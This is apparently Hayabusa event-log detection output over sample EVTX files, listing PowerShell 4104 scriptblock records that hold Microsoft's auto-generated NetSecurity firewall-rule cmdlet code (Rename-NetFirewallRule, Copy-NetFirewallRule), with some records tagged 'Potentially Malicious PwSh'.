[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 